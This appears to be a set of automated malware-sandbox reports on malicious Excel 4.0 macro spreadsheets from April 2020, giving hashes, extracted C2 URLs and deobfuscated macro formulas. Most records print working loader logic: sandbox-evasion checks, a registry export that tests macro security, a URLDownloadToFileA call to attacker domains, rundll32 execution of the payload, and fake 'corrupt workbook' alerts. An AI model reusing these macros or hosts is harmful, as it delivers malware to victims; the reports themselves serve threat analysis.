{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0f8cf46ef94cf7b4a33480a23c7cc4daa96979b803ae57b4c4f05734dae9677"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0f8cf46ef94cf7b4a33480a23c7cc4daa96979b803ae57b4c4f05734dae9677","filesize":141824,"md5":"7f1530e93c63b2d30fb038eba43e7a17","sha1":"443ea2c93c1a8d4dc6a251e61d6ce43a54d86f52","sha256":"b0f8cf46ef94cf7b4a33480a23c7cc4daa96979b803ae57b4c4f05734dae9677","sha512":"5f3d1ab3529953e5b6a6d158d0ddbbd16b50c452df4f59d26f7c4207156cb8bc2ebc34d8f46b3a0cdcbc3d0191b5d92fe30af2bdce2e32591c50933731621a10","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0f8cf46ef94cf7b4a33480a23c7cc4daa96979b803ae57b4c4f05734dae9677.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"OCN3QnmRbn\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0fdbd6dfd8c0158597173dd7fec187df172936667c51706e10636a1d91fea58"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0fdbd6dfd8c0158597173dd7fec187df172936667c51706e10636a1d91fea58","filesize":185344,"md5":"49bab4548a7aea51839721ebd2400f92","sha1":"d023e9af0d77f0cdfb582d4053524db856fb354d","sha256":"b0fdbd6dfd8c0158597173dd7fec187df172936667c51706e10636a1d91fea58","sha512":"2ac0cc6b57a55e5f083013bc2f4eb062600c4431d5903de6f147db78e785fdf3530d7ad7acc0a2103a45f76edabbd0fdb03d82c60e1a88de0e6227f2bcf1fc1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0fdbd6dfd8c0158597173dd7fec187df172936667c51706e10636a1d91fea58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1007ee76b8dfd28c86ad05f5c76cb6fd548b298d45517d5814a65cf1d318c65"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b1007ee76b8dfd28c86ad05f5c76cb6fd548b298d45517d5814a65cf1d318c65","filesize":185344,"md5":"cb78f297fe6d0f010d93e47a090ac857","sha1":"c4fa398171f76f182167df5de7e951a6cdf9afc7","sha256":"b1007ee76b8dfd28c86ad05f5c76cb6fd548b298d45517d5814a65cf1d318c65","sha512":"18058e440da03b917b7f0690eee3931b8fa3af08fed31bebaaf5b63516b75c728c83b22c8998bfda82fc8c1c5ad5b40be550a9bbd4ce2b3d201ce7bccde89e9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1007ee76b8dfd28c86ad05f5c76cb6fd548b298d45517d5814a65cf1d318c65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b10d9ccfe00615c055bd8424a8b556c039ff8634775291d3b0900b0da8d17c16"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b10d9ccfe00615c055bd8424a8b556c039ff8634775291d3b0900b0da8d17c16","filesize":206336,"md5":"9cde7fad69656efc65167f2f3e3f676b","sha1":"e7c49ed672c1a16a12e9a5ede615b6a55271376d","sha256":"b10d9ccfe00615c055bd8424a8b556c039ff8634775291d3b0900b0da8d17c16","sha512":"32b91337726927f4114278777c558895a0456789dca7f994bf21c47cc5c2e777b008e42c73dfb251a3ba1c65e9175556e4a162feefb3fb5de6abafe00600eb2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b10d9ccfe00615c055bd8424a8b556c039ff8634775291d3b0900b0da8d17c16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N4fqNZLqVS\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b10f7117365a12d2c58f40964f63d3c37117a51f7c47115de088f0556b2148c8"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b10f7117365a12d2c58f40964f63d3c37117a51f7c47115de088f0556b2148c8","filesize":185344,"md5":"13ec596bc4d960fb74494b7e32323d37","sha1":"5b8872bf423c5abcf560bf2ecd76b94b72317851","sha256":"b10f7117365a12d2c58f40964f63d3c37117a51f7c47115de088f0556b2148c8","sha512":"8297bdaa3c46cc10d974e4c3543b9f776d2893a3f8309db42cc75891a7249a802e08c29e04dfb84ad597e921396dd2a86f9749d25e8bd140a5103d522a85c5e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b10f7117365a12d2c58f40964f63d3c37117a51f7c47115de088f0556b2148c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b11095acf0975972fca668044158883b83df9b246b5a8b601d1da707ff94e943"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b11095acf0975972fca668044158883b83df9b246b5a8b601d1da707ff94e943","filesize":221184,"md5":"2dd87a2353ecc8c5fa2ae1d267237c6a","sha1":"cd2b50a53f26a79751ba3400f00bb14b06346f61","sha256":"b11095acf0975972fca668044158883b83df9b246b5a8b601d1da707ff94e943","sha512":"1c9f830b7928428255da32c38109deddde4b2be18d007199b0e599af4ec9df91ae5c847fbd15b3b3161a25ccceddbea705429a94fcce2cf2690c4d9d44b18e1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b11095acf0975972fca668044158883b83df9b246b5a8b601d1da707ff94e943.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z1g1IvEolu\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b113bd9e9e08a4dbe8c1b662e832708bcd111616406e809487e7dba5cc4159b0"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b113bd9e9e08a4dbe8c1b662e832708bcd111616406e809487e7dba5cc4159b0","filesize":185344,"md5":"bc6b042743eba4bf831da978848691c1","sha1":"37695ef1f0479946ef47de92dea180122b62fdfa","sha256":"b113bd9e9e08a4dbe8c1b662e832708bcd111616406e809487e7dba5cc4159b0","sha512":"e16863059d86fd8d09ca1a83f042cb0e683628eee5def625ab85287926a2167c1d1512830e500c206d656277e0de14c314d013ab239a2d9d14c82a3677df2ba2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b113bd9e9e08a4dbe8c1b662e832708bcd111616406e809487e7dba5cc4159b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1141bd1624ca243d999ec61b239412e4463116683cd620b47c6bc13e9a9362c"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b1141bd1624ca243d999ec61b239412e4463116683cd620b47c6bc13e9a9362c","filesize":170496,"md5":"a10ad3bc911a43fb0267da71870170d2","sha1":"6ae9badeadb3d151980d9f9f3ff146c3041aa4f7","sha256":"b1141bd1624ca243d999ec61b239412e4463116683cd620b47c6bc13e9a9362c","sha512":"83200e8fc36f5b028722678b366442580600b81022ee4122a4d816410137ce5f67bfbee9caa31914655b03ab854e19f218d766f23c3de4c6819031c4e6175b22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1141bd1624ca243d999ec61b239412e4463116683cd620b47c6bc13e9a9362c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LA84dtYafa\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b11f0868bb617a37a198a96dd5bd6f410876490e1ab8da5ecea3cadfbf0eea83"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b11f0868bb617a37a198a96dd5bd6f410876490e1ab8da5ecea3cadfbf0eea83","filesize":170496,"md5":"83b4607f54d4a2b60d662e3d936505d6","sha1":"cf46647e58fcf54b4a6ca4ba168646bd6b5646e8","sha256":"b11f0868bb617a37a198a96dd5bd6f410876490e1ab8da5ecea3cadfbf0eea83","sha512":"1d551de3845624836dc85724b4ac536130f960e798f8715d46df7c62ca0d1c13c48c0ee8da3749a25bb0ead9261ed1d265bbb660482646c45a3a152f8ba32070","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b11f0868bb617a37a198a96dd5bd6f410876490e1ab8da5ecea3cadfbf0eea83.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bqAjUUPOgt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1246f842850296e6c4278808def00fb411bd4121a39615bd689688a93f29d34"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b1246f842850296e6c4278808def00fb411bd4121a39615bd689688a93f29d34","filesize":167936,"md5":"1739fa6b60d77daea66c558845358516","sha1":"578815cc5e684787bc65ba3dbe32c51f73df0571","sha256":"b1246f842850296e6c4278808def00fb411bd4121a39615bd689688a93f29d34","sha512":"737add211f1aa181f7672f2a022e26c6751fc31b424c62d9d1ebf5481ba18f4db7a846896ec7f570eb7460bf951448dab913192f9480d8fc8c7bd1b4e646663d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1246f842850296e6c4278808def00fb411bd4121a39615bd689688a93f29d34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cR7MEDXzG8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1277f6cd87e435e62cae3845af5997759412abe66ade75930762b9b1cd83ecd"},"analysis":{"reported":"2020-04-09T16:18:23Z","score":10},"files":[{"filename":"b1277f6cd87e435e62cae3845af5997759412abe66ade75930762b9b1cd83ecd","filesize":170496,"md5":"e915655a03ccc17d4720d0260158a4cf","sha1":"9a943628a4e1e16afb6bc18bfcf4b0d2cc54903e","sha256":"b1277f6cd87e435e62cae3845af5997759412abe66ade75930762b9b1cd83ecd","sha512":"a711715422a9e84503430cd6bd19fc7efa7bf964e740c8c30303e36ffc0821f21c8d6367745b87dba631b94830d73f6d8da4426f549a688c888dd9fc7b029d22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1277f6cd87e435e62cae3845af5997759412abe66ade75930762b9b1cd83ecd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mKorfVk9t7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b14aaab7b99a1ba6832e37ff4bcc024ad1602a26fc82bded5cc5c89fde45a106"},"analysis":{"reported":"2020-04-09T16:18:23Z","score":10},"files":[{"filename":"b14aaab7b99a1ba6832e37ff4bcc024ad1602a26fc82bded5cc5c89fde45a106","filesize":206336,"md5":"bdadbc723136df33452f2f4d1eca622e","sha1":"6345c4b38842e1854d4ddbad15326d5dd0d76b3f","sha256":"b14aaab7b99a1ba6832e37ff4bcc024ad1602a26fc82bded5cc5c89fde45a106","sha512":"d1c377bc979b199c4a4c2f9ecae5a14e5deeb66baa580da1f0e1fe43e7e029b107890f8e9b2f7a89394ccf01c882d1bf12e4ce400a1dcdc6653e9694314b4217","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b14aaab7b99a1ba6832e37ff4bcc024ad1602a26fc82bded5cc5c89fde45a106.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rw6PR1o2bM\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1a52addfb8f9aa52de1feac2f6b83c4e3dae323da9ba3ff40600bd73789c5ed"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b1a52addfb8f9aa52de1feac2f6b83c4e3dae323da9ba3ff40600bd73789c5ed","filesize":126464,"md5":"4b02b2158a2790dbe401093b457fae49","sha1":"ed999e577ce43cf193ea829c4386096f2fd93fc4","sha256":"b1a52addfb8f9aa52de1feac2f6b83c4e3dae323da9ba3ff40600bd73789c5ed","sha512":"852ef7512d33bd2049e60315efa5f42ff76de48925172e620bee1e0684f6844d1425ca050d18ddc2817c15b47fe9cf49fe86cee7fc57eec686420a75561f9a1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1a52addfb8f9aa52de1feac2f6b83c4e3dae323da9ba3ff40600bd73789c5ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1b550f1998615c69abd4b7ae3e23fadc7af6a05455cde672387eea5e329bfe8"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b1b550f1998615c69abd4b7ae3e23fadc7af6a05455cde672387eea5e329bfe8","filesize":209920,"md5":"28beaaa7dced6b0bcc57ba96b5d0f6ee","sha1":"65638b97970630ad7b5fba3e2356a7916e60c2dc","sha256":"b1b550f1998615c69abd4b7ae3e23fadc7af6a05455cde672387eea5e329bfe8","sha512":"8b39dca11f68761659209d2cbfba72725bc4ac188d91c180602e26083180f016223d05d15b71727162e6649447ebdb9e5c0f1ee4ae0dad2b49e74d8622b332de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1b550f1998615c69abd4b7ae3e23fadc7af6a05455cde672387eea5e329bfe8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fVi41EBeJi\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1b92d4f077809989f190d5506d26da4cf8f6fc83cd37bf75c667bc2b5c34057"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b1b92d4f077809989f190d5506d26da4cf8f6fc83cd37bf75c667bc2b5c34057","filesize":113664,"md5":"547f54a6e21714c7fe9be637a43fb778","sha1":"92c4c9b9736938163d6ce46ddfd75e0962bd1e93","sha256":"b1b92d4f077809989f190d5506d26da4cf8f6fc83cd37bf75c667bc2b5c34057","sha512":"360cdde931988929aae94086d214782300859045a6e77c1db1d12f396927b6b00cc736011f3f2d81c99225966d46dec460d99c6ddbb4b7772ef187adfcf1f219","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1b92d4f077809989f190d5506d26da4cf8f6fc83cd37bf75c667bc2b5c34057.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9E0U52ae9P\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1ea87f684aa021da6273471c3fe2faabb0adcdf139caca25540472b54d1e7a6"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b1ea87f684aa021da6273471c3fe2faabb0adcdf139caca25540472b54d1e7a6","filesize":168960,"md5":"9d7c836f968983cd541a7cb06348236c","sha1":"97fdecb8e8a368746b42a3774773ec17f1e4bd10","sha256":"b1ea87f684aa021da6273471c3fe2faabb0adcdf139caca25540472b54d1e7a6","sha512":"4a831cbb2601df5f9d85480617e7e60297e5b31ccd1eea8ca8d6a42e85d530cd3c7d7fc4a34245472ab5c38893869ea630ea797aca3fedfb6c4d5571dd56596a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1ea87f684aa021da6273471c3fe2faabb0adcdf139caca25540472b54d1e7a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4NVDAH3oPJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
